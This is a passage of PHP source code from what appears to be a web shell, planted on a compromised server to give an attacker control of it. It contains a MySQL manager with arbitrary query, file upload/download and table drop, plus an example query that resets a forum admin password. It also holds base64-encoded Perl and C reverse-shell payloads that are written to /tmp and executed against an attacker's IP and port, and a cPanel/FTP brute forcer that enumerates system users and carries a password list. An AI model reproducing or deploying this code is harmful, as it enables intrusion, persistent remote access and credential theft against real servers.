1331 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
1332
1333 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
1334
1335 $('mysqlfile').charset.value=$('dbinfo').charset.value;
1336
1337 $('mysqlfile').submit();
1338
1339}
1340
1341</script>
1342
1343<?php
1344
1345 !$dbhost && $dbhost = 'localhost';
1346
1347 !$dbuser && $dbuser = 'root';
1348
1349 !$dbport && $dbport = '3306';
1350
1351 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
1352
1353 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
1354
1355 makehide('action','sqlfile');
1356
1357 p('<p>');
1358
1359 p('DBHost:');
1360
1361 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
1362
1363 p(':');
1364
1365 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
1366
1367 p('DBUser:');
1368
1369 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
1370
1371 p('DBPass:');
1372
1373 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
1374
1375 p('DBName:');
1376
1377 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
1378
1379 p('DBCharset:');
1380
1381 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
1382
1383 p('</p>');
1384
1385 formfoot();
1386
1387 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
1388
1389 p('<h2>Upload file</h2>');
1390
1391 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
1392
1393 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
1394
1395 p('<h2>Download file</h2>');
1396
1397 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
1398
1399 makehide('dbhost');
1400
1401 makehide('dbport');
1402
1403 makehide('dbuser');
1404
1405 makehide('dbpass');
1406
1407 makehide('dbname');
1408
1409 makehide('charset');
1410
1411 makehide('doing');
1412
1413 makehide('action','sqlfile');
1414
1415 p('</form>');
1416
1417}
1418
1419
1420
1421elseif ($action == 'sqladmin') {
1422
1423 !$dbhost && $dbhost = 'localhost';
1424
1425 !$dbuser && $dbuser = 'root';
1426
1427 !$dbport && $dbport = '3306';
1428
1429 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
1430
1431 if(isset($dbhost)){
1432
1433 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
1434
1435 }
1436
1437 if(isset($dbuser)) {
1438
1439 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
1440
1441 }
1442
1443 if(isset($dbpass)) {
1444
1445 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
1446
1447 }
1448
1449 if(isset($dbport)) {
1450
1451 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
1452
1453 }
1454
1455 if(isset($dbname)) {
1456
1457 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
1458
1459 }
1460
1461 if(isset($charset)) {
1462
1463 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
1464
1465 }
1466
1467
1468
1469 if ($doing == 'backupmysql' && $saveasfile) {
1470
1471 if (!$table) {
1472
1473 m('Please choose the table');
1474
1475 } else {
1476
1477 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1478
1479 $table = array_flip($table);
1480
1481 $fp = @fopen($path,'w');
1482
1483 if ($fp) {
1484
1485 $result = q('SHOW tables');
1486
1487 if (!$result) p('<h2>'.mysql_error().'</h2>');
1488
1489 $mysqldata = '';
1490
1491 while ($currow = mysql_fetch_array($result)) {
1492
1493 if (isset($table[$currow[0]])) {
1494
1495 sqldumptable($currow[0], $fp);
1496
1497 }
1498
1499 }
1500
1501 fclose($fp);
1502
1503 $fileurl = str_replace(SA_ROOT,'',$path);
1504
1505 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
1506
1507 mysql_close();
1508
1509 } else {
1510
1511 m('Backup failed');
1512
1513 }
1514
1515 }
1516
1517 }
1518
1519 if ($insert && $insertsql) {
1520
1521 $keystr = $valstr = $tmp = '';
1522
1523 foreach($insertsql as $key => $val) {
1524
1525 if ($val) {
1526
1527 $keystr .= $tmp.$key;
1528
1529 $valstr .= $tmp."'".addslashes($val)."'";
1530
1531 $tmp = ',';
1532
1533 }
1534
1535 }
1536
1537 if ($keystr && $valstr) {
1538
1539 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1540
1541 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
1542
1543 }
1544
1545 }
1546
1547 if ($update && $insertsql && $base64) {
1548
1549 $valstr = $tmp = '';
1550
1551 foreach($insertsql as $key => $val) {
1552
1553 $valstr .= $tmp.$key."='".addslashes($val)."'";
1554
1555 $tmp = ',';
1556
1557 }
1558
1559 if ($valstr) {
1560
1561 $where = base64_decode($base64);
1562
1563 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1564
1565 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
1566
1567 }
1568
1569 }
1570
1571 if ($doing == 'del' && $base64) {
1572
1573 $where = base64_decode($base64);
1574
1575 $delete_sql = "DELETE FROM $tablename WHERE $where";
1576
1577 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1578
1579 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
1580
1581 }
1582
1583
1584
1585 if ($tablename && $doing == 'drop') {
1586
1587 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
1588
1589 if (q("DROP TABLE $tablename")) {
1590
1591 m('Drop table of success');
1592
1593 $tablename = '';
1594
1595 } else {
1596
1597 m(mysql_error());
1598
1599 }
1600
1601 }
1602
1603
1604
1605 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
1606
1607
1608
1609 formhead(array('title'=>'MYSQL Manager'));
1610
1611 makehide('action','sqladmin');
1612
1613 p('<p>');
1614
1615 p('DBHost:');
1616
1617 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
1618
1619 p(':');
1620
1621 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
1622
1623 p('DBUser:');
1624
1625 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
1626
1627 p('DBPass:');
1628
1629 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
1630
1631 p('DBCharset:');
1632
1633 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
1634
1635 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
1636
1637 p('</p>');
1638
1639 formfoot();
1640
1641?>
1642
1643<script type="text/javascript">
1644
1645function editrecord(action, base64, tablename){
1646
1647 if (action == 'del') {
1648
1649 if (!confirm('Is or isn\'t deletion record?')) return;
1650
1651 }
1652
1653 $('recordlist').doing.value=action;
1654
1655 $('recordlist').base64.value=base64;
1656
1657 $('recordlist').tablename.value=tablename;
1658
1659 $('recordlist').submit();
1660
1661}
1662
1663function moddbname(dbname) {
1664
1665 if(!dbname) return;
1666
1667 $('setdbname').dbname.value=dbname;
1668
1669 $('setdbname').submit();
1670
1671}
1672
1673function settable(tablename,doing,page) {
1674
1675 if(!tablename) return;
1676
1677 if (doing) {
1678
1679 $('settable').doing.value=doing;
1680
1681 }
1682
1683 if (page) {
1684
1685 $('settable').page.value=page;
1686
1687 }
1688
1689 $('settable').tablename.value=tablename;
1690
1691 $('settable').submit();
1692
1693}
1694
1695</script>
1696
1697<?php
1698
1699 // SQL
1700
1701 formhead(array('name'=>'recordlist'));
1702
1703 makehide('doing');
1704
1705 makehide('action','sqladmin');
1706
1707 makehide('base64');
1708
1709 makehide('tablename');
1710
1711 p($dbform);
1712
1713 formfoot();
1714
1715
1716
1717 // Data
1718
1719 formhead(array('name'=>'setdbname'));
1720
1721 makehide('action','sqladmin');
1722
1723 p($dbform);
1724
1725 if (!$dbname) {
1726
1727 makehide('dbname');
1728
1729 }
1730
1731 formfoot();
1732
1733
1734
1735
1736
1737 formhead(array('name'=>'settable'));
1738
1739 makehide('action','sqladmin');
1740
1741 p($dbform);
1742
1743 makehide('tablename');
1744
1745 makehide('page',$page);
1746
1747 makehide('doing');
1748
1749 formfoot();
1750
1751
1752
1753 $cachetables = array();
1754
1755 $pagenum = 30;
1756
1757 $page = intval($page);
1758
1759 if($page) {
1760
1761 $start_limit = ($page - 1) * $pagenum;
1762
1763 } else {
1764
1765 $start_limit = 0;
1766
1767 $page = 1;
1768
1769 }
1770
1771 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
1772
1773 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
1774
1775 // get mysql server
1776
1777 $mysqlver = mysql_get_server_info();
1778
1779 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
1780
1781 $highver = $mysqlver > '4.1' ? 1 : 0;
1782
1783
1784
1785 // Show database
1786
1787 $query = q("SHOW DATABASES");
1788
1789 $dbs = array();
1790
1791 $dbs[] = '-- Select a database --';
1792
1793 while($db = mysql_fetch_array($query)) {
1794
1795 $dbs[$db['Database']] = $db['Database'];
1796
1797 }
1798
1799 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
1800
1801 $tabledb = array();
1802
1803 if ($dbname) {
1804
1805 p('<p>');
1806
1807 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
1808
1809 if ($tablename) {
1810
1811 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
1812
1813 }
1814
1815 p('</p>');
1816
1817 mysql_select_db($dbname);
1818
1819
1820
1821 $getnumsql = '';
1822
1823 $runquery = 0;
1824
1825 if ($sql_query) {
1826
1827 $runquery = 1;
1828
1829 }
1830
1831 $allowedit = 0;
1832
1833 if ($tablename && !$sql_query) {
1834
1835 $sql_query = "SELECT * FROM $tablename";
1836
1837 $getnumsql = $sql_query;
1838
1839 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
1840
1841 $allowedit = 1;
1842
1843 }
1844
1845 p('<form action="'.$self.'" method="POST">');
1846
1847 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
1848
1849 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
1850
1851 makehide('tablename', $tablename);
1852
1853 makehide('action','sqladmin');
1854
1855 p($dbform);
1856
1857 p('</form>');
1858
1859 if ($tablename || ($runquery && $sql_query)) {
1860
1861 if ($doing == 'structure') {
1862
1863 $result = q("SHOW COLUMNS FROM $tablename");
1864
1865 $rowdb = array();
1866
1867 while($row = mysql_fetch_array($result)) {
1868
1869 $rowdb[] = $row;
1870
1871 }
1872
1873 p('<table border="0" cellpadding="3" cellspacing="0">');
1874
1875 p('<tr class="head">');
1876
1877 p('<td>Field</td>');
1878
1879 p('<td>Type</td>');
1880
1881 p('<td>Null</td>');
1882
1883 p('<td>Key</td>');
1884
1885 p('<td>Default</td>');
1886
1887 p('<td>Extra</td>');
1888
1889 p('</tr>');
1890
1891 foreach ($rowdb as $row) {
1892
1893 $thisbg = bg();
1894
1895 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1896
1897 p('<td>'.$row['Field'].'</td>');
1898
1899 p('<td>'.$row['Type'].'</td>');
1900
1901 p('<td>'.$row['Null'].' </td>');
1902
1903 p('<td>'.$row['Key'].' </td>');
1904
1905 p('<td>'.$row['Default'].' </td>');
1906
1907 p('<td>'.$row['Extra'].' </td>');
1908
1909 p('</tr>');
1910
1911 }
1912
1913 tbfoot();
1914
1915 } elseif ($doing == 'insert' || $doing == 'edit') {
1916
1917 $result = q('SHOW COLUMNS FROM '.$tablename);
1918
1919 while ($row = mysql_fetch_array($result)) {
1920
1921 $rowdb[] = $row;
1922
1923 }
1924
1925 $rs = array();
1926
1927 if ($doing == 'insert') {
1928
1929 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1930
1931 } else {
1932
1933 p('<h2>Update record in '.$tablename.' table »</h2>');
1934
1935 $where = base64_decode($base64);
1936
1937 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1938
1939 $rs = mysql_fetch_array($result);
1940
1941 }
1942
1943 p('<form method="post" action="'.$self.'">');
1944
1945 p($dbform);
1946
1947 makehide('action','sqladmin');
1948
1949 makehide('tablename',$tablename);
1950
1951 p('<table border="0" cellpadding="3" cellspacing="0">');
1952
1953 foreach ($rowdb as $row) {
1954
1955 if ($rs[$row['Field']]) {
1956
1957 $value = htmlspecialchars($rs[$row['Field']]);
1958
1959 } else {
1960
1961 $value = '';
1962
1963 }
1964
1965 $thisbg = bg();
1966
1967 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1968
1969 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1970
1971 }
1972
1973 if ($doing == 'insert') {
1974
1975 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1976
1977 } else {
1978
1979 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1980
1981 makehide('base64', $base64);
1982
1983 }
1984
1985 p('</table></form>');
1986
1987 } else {
1988
1989 $querys = @explode(';',$sql_query);
1990
1991 foreach($querys as $num=>$query) {
1992
1993 if ($query) {
1994
1995 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1996
1997 switch(qy($query))
1998
1999 {
2000
2001 case 0:
2002
2003 p('<h2>Error : '.mysql_error().'</h2>');
2004
2005 break;
2006
2007 case 1:
2008
2009 if (strtolower(substr($query,0,13)) == 'select * from') {
2010
2011 $allowedit = 1;
2012
2013 }
2014
2015 if ($getnumsql) {
2016
2017 $tatol = mysql_num_rows(q($getnumsql));
2018
2019 $multipage = multi($tatol, $pagenum, $page, $tablename);
2020
2021 }
2022
2023 if (!$tablename) {
2024
2025 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
2026
2027 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
2028
2029 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
2030
2031 $tablename = $matches[1][0];
2032
2033 }
2034
2035 $result = q($query);
2036
2037 p($multipage);
2038
2039 p('<table border="0" cellpadding="3" cellspacing="0">');
2040
2041 p('<tr class="head">');
2042
2043 if ($allowedit) p('<td>Action</td>');
2044
2045 $fieldnum = @mysql_num_fields($result);
2046
2047 for($i=0;$i<$fieldnum;$i++){
2048
2049 $name = @mysql_field_name($result, $i);
2050
2051 $type = @mysql_field_type($result, $i);
2052
2053 $len = @mysql_field_len($result, $i);
2054
2055 p("<td nowrap>$name<br><span>$type($len)</span></td>");
2056
2057 }
2058
2059 p('</tr>');
2060
2061 while($mn = @mysql_fetch_assoc($result)){
2062
2063 $thisbg = bg();
2064
2065 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
2066
2067 $where = $tmp = $b1 = '';
2068
2069 foreach($mn as $key=>$inside){
2070
2071 if ($inside) {
2072
2073 $where .= $tmp.$key."='".addslashes($inside)."'";
2074
2075 $tmp = ' AND ';
2076
2077 }
2078
2079 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
2080
2081 }
2082
2083 $where = base64_encode($where);
2084
2085 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
2086
2087 p($b1);
2088
2089 p('</tr>');
2090
2091 unset($b1);
2092
2093 }
2094
2095 tbfoot();
2096
2097 p($multipage);
2098
2099 break;
2100
2101 case 2:
2102
2103 $ar = mysql_affected_rows();
2104
2105 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
2106
2107 break;
2108
2109 }
2110
2111 }
2112
2113 }
2114
2115 }
2116
2117 } else {
2118
2119 $query = q("SHOW TABLE STATUS");
2120
2121 $table_num = $table_rows = $data_size = 0;
2122
2123 $tabledb = array();
2124
2125 while($table = mysql_fetch_array($query)) {
2126
2127 $data_size = $data_size + $table['Data_length'];
2128
2129 $table_rows = $table_rows + $table['Rows'];
2130
2131 $table['Data_length'] = sizecount($table['Data_length']);
2132
2133 $table_num++;
2134
2135 $tabledb[] = $table;
2136
2137 }
2138
2139 $data_size = sizecount($data_size);
2140
2141 unset($table);
2142
2143 p('<table border="0" cellpadding="0" cellspacing="0">');
2144
2145 p('<form action="'.$self.'" method="POST">');
2146
2147 makehide('action','sqladmin');
2148
2149 p($dbform);
2150
2151 p('<tr class="head">');
2152
2153 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
2154
2155 p('<td>Name</td>');
2156
2157 p('<td>Rows</td>');
2158
2159 p('<td>Data_length</td>');
2160
2161 p('<td>Create_time</td>');
2162
2163 p('<td>Update_time</td>');
2164
2165 if ($highver) {
2166
2167 p('<td>Engine</td>');
2168
2169 p('<td>Collation</td>');
2170
2171 }
2172
2173 p('</tr>');
2174
2175 foreach ($tabledb as $key => $table) {
2176
2177 $thisbg = bg();
2178
2179 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
2180
2181 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
2182
2183 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
2184
2185 p('<td>'.$table['Rows'].'</td>');
2186
2187 p('<td>'.$table['Data_length'].'</td>');
2188
2189 p('<td>'.$table['Create_time'].'</td>');
2190
2191 p('<td>'.$table['Update_time'].'</td>');
2192
2193 if ($highver) {
2194
2195 p('<td>'.$table['Engine'].'</td>');
2196
2197 p('<td>'.$table['Collation'].'</td>');
2198
2199 }
2200
2201 p('</tr>');
2202
2203 }
2204
2205 p('<tr class=fout>');
2206
2207 p('<td> </td>');
2208
2209 p('<td>Total tables: '.$table_num.'</td>');
2210
2211 p('<td>'.$table_rows.'</td>');
2212
2213 p('<td>'.$data_size.'</td>');
2214
2215 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
2216
2217 p('</tr>');
2218
2219
2220
2221 p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."sql.gz\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
2222
2223 makehide('doing','backupmysql');
2224
2225 formfoot();
2226
2227 p("</table>");
2228
2229 fr($query);
2230
2231 }
2232
2233 }
2234
2235 }
2236
2237 tbfoot();
2238
2239 @mysql_close();
2240
2241}//end sql backup
2242
2243
2244
2245
2246
2247elseif ($action == 'backconnect') {
2248
2249 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
2250
2251 !$yourport && $yourport = '12345';
2252
2253 $usedb = array('perl'=>'perl','c'=>'c');
2254
2255
2256
2257 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
2258
2259 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
2260
2261 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
2262
2263 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
2264
2265 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
2266
2267 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
2268
2269 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2270
2271 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
2272
2273 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
2274
2275 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
2276
2277 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
2278
2279 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
2280
2281 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
2282
2283 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
2284
2285 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2286
2287
2288
2289 if ($start && $yourip && $yourport && $use){
2290
2291 if ($use == 'perl') {
2292
2293 cf('/tmp/angel_bc',$back_connect);
2294
2295 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
2296
2297 } else {
2298
2299 cf('/tmp/angel_bc.c',$back_connect_c);
2300
2301 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
2302
2303 @unlink('/tmp/angel_bc.c');
2304
2305 $res = execute("/tmp/angel_bc $yourip $yourport &");
2306
2307 }
2308
2309 m("Now script try connect to $yourip port $yourport ...");
2310
2311 }
2312
2313
2314
2315 formhead(array('title'=>'Back Connect'));
2316
2317 makehide('action','backconnect');
2318
2319 p('<p>');
2320
2321 p('Your IP:');
2322
2323 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
2324
2325 p('Your Port:');
2326
2327 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
2328
2329 p('Use:');
2330
2331 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
2332
2333 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
2334
2335 p('</p>');
2336
2337 formfoot();
2338
2339}//end backconnect window via NC
2340
2341
2342
2343// Brute
2344
2345elseif ($action == 'brute') {
2346
2347formhead(array('title'=>'Brute Forcer'));
2348
2349 makehide('action','brute');
2350
2351 makehide('dir',$brute);
2352
2353@ini_set('memory_limit', 1000000000000);
2354
2355$connect_timeout=5;
2356
2357@set_time_limit(0);
2358
2359$submit = $_REQUEST['submit'];
2360
2361$users = $_REQUEST['users'];
2362
2363$pass = $_REQUEST['passwords'];
2364
2365$target = $_REQUEST['target'];
2366
2367$option = $_REQUEST['option'];
2368
2369
2370
2371
2372
2373$passlist = "123pass
2374
2375123!@#
2376
2377123admin
2378
2379123abc
2380
2381123456admin
2382
23831234554321
2384
238512344321
2386
2387pass123
2388
2389admin
2390
2391admincp
2392
2393administrator
2394
2395matkhau
2396
2397passadmin
2398
2399p@ssword
2400
2401password
2402
2403012345
2404
2405123456
2406
24071234567
2408
240912345678
2410
2411123456789
2412
24131234567890
2414
2415111111
2416
2417000000
2418
2419222222
2420
2421333333
2422
2423444444
2424
2425555555
2426
2427666666
2428
2429777777
2430
2431888888
2432
2433999999
2434
2435123123
2436
2437234234
2438
2439345345
2440
2441456456
2442
2443567567
2444
2445678678
2446
2447789789
2448
2449123321
2450
2451456654
2452
2453654321
2454
24557654321
2456
245787654321
2458
2459987654321
2460
24610987654321
2462
2463admin123
2464
2465admin123456
2466
2467abcdef
2468
2469abcabc
2470
2471!@#!@#
2472
2473!@#$%^
2474
2475!@#$%^&*(
2476
2477!@#$$#@!
2478
2479abc123
2480
2481anhyeuem
2482
2483iloveyou
2484
2485admin
2486
2487administrator
2488
2489admincp
2490
2491cpanel
2492
2493adminx
2494
2495admins
2496
2497password
2498
2499passwords
2500
2501passw0rd
2502
2503p@ssw0rd
2504
2505p@ssword
2506
2507khongco
2508
250925251325
2510
2511passw0rds";
2512
2513if($target == ''){
2514
2515$target = 'localhost';
2516
2517}
2518
2519print " <div align='center'>
2520
2521<form method='post' style='border: 1px solid #000000'><br><br>
2522
2523<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
2524
2525<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
2526
2527<div align='center'><br>
2528
2529<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
2530
2531<tr>
2532
2533<td align='center'>
2534
2535<b>Username</b></td>
2536
2537<td>
2538
2539<p align='center'>
2540
2541<b>Password</b></td>
2542
2543</tr>
2544
2545</table>
2546
2547<p align='center'>
2548
2549<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
2550
2551$i = 0;
2552
2553while ($i < 60000) {
2554
2555
2556
2557 $line = posix_getpwuid($i);
2558
2559 if (!empty($line)) {
2560
2561
2562
2563 while (list ($key, $vba_etcpwd) = each($line)){
2564
2565 echo "".$vba_etcpwd."\n";
2566
2567 break;
2568
2569 }
2570
2571
2572
2573 }
2574
2575
2576
2577 $i++;
2578
2579}
2580
2581echo "
2582
2583</textarea>
2584
2585<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
2586
2587<br>
2588
2589<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
2590
2591<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
2592
2593</td></tr></table></td></tr></form><p align= 'left'>";
2594
2595?>
2596
2597<?php
2598
2599function ftp_check($host,$user,$pass,$timeout){
2600
2601$ch = curl_init();
2602
2603curl_setopt($ch, CURLOPT_URL, "ftp://$host");
2604
2605curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2606
2607curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
2608
